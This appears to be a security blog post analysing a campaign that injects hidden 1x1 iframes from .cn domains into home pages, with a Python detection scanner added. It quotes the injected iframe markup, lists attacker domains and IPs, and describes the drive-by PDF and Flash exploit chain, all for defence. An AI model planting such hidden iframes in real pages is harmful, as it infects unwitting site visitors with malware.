New week, new leader: this time it is various hidden iframes from .cn domains injected at the bottom of home pages.
The HTML code looks like this:
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
The domain names may vary, but they always end with .cn and usually contain the words "lot" and "bet". They all reside on the same server, with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
Here is a list of domains used in this malware campaign:
Like most other iframe injection exploits, this one is easily detected by Unmask Parasites: you will see the hidden iframes in the “External References” section.
Sometimes you can see more than one iframe injected into the same web page.
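A small scanner for the injection pattern described above, added here as an example (it is not the post's or Unmask Parasites' own code). It parses a page, keeps only iframes that point at an external host and are concealed (1x1, hidden via CSS, or using the in.cgi?incomeNN path), and reports why; the sample page and the lotbetexample.cn domain are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics from the campaign described in the post: a 1x1 or CSS-hidden
# iframe whose src points at an external host, typically a .cn domain
# loading a path like "in.cgi?incomeNN".
INCOME_PATH = re.compile(r"/in\.cgi\?income\d+")
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

# Constructed sample page: one benign visible embed, one injected iframe
# appended after </html>. lotbetexample.cn is a placeholder, not a real IoC.
SAMPLE_HTML = """<html><body><h1>Home</h1>
<iframe src="https://video.example.net/embed/123" width="560" height="315"></iframe>
</body></html>
<iframe src="http://lotbetexample.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
"""


class IframeCollector(HTMLParser):
    # Collect the attributes of every <iframe> start tag, even outside <html>.
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _at_most_one_pixel(value):
    # width=1, width="1" and width="1px" all count as a hidden-size frame.
    try:
        return int(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(html, page_host):
    # Return (src, reasons) for each external iframe that is hidden from visitors.
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if _at_most_one_pixel(attrs.get("width")) and _at_most_one_pixel(attrs.get("height")):
            reasons.append("1x1 size")
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden via CSS")
        if INCOME_PATH.search(src):
            reasons.append("in.cgi?income path")
        if reasons and host and host != page_host.lower():  # external AND concealed
            if host.endswith(".cn"):
                reasons.append(".cn domain")
            findings.append((src, reasons))
    return findings
```

Run it over a saved copy of a home page with the site's own hostname as `page_host`; same-origin or visible embeds are not reported.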
To my surprise, these iframes are poorly detected by Google. Many compromised web sites are still not listed as suspicious, and the majority of the .cn domains used in this attack are not blacklisted either. (I’ve been submitting the malicious domains to Google for the last couple of days, to no avail.)
When Google does detect the malicious content, you will see the following text on Safe Browsing diagnostic pages: “Malicious software is hosted on 1 domain(s), including hyperliteautoservices .cn/.”
This happens because the initial pages loaded in the iframes redirect to a malicious script on hyperliteautoservices .cn, which checks which plugins are installed in a visitor’s browser and downloads either an infected PDF file or a Flash (swf) file (browsers open such files automatically). All of this happens behind the scenes, so visitors would never know about the infection.
These files change every day, which makes anti-virus detection very problematic. I sent both files to VirusTotal and the detection rates were very low: 5/40 for readme.pdf and 2/40 for flash.swf. None of the major anti-virus tools detected these files.
If you are still using Acrobat Reader 8.1.2 or older, upgrade ASAP. The current version is 9.1.
The PDF file silently downloads a malicious binary (a Windows executable) from litehitscar .cn, which resides on the same server as hyperliteautoservices .cn (IP 94 .247 .3 .151). According to VirusTotal, the detection rate of this malware is very low as well: 3/40.
If you have any additional information on this issue or want to ask a question, consider leaving a comment below.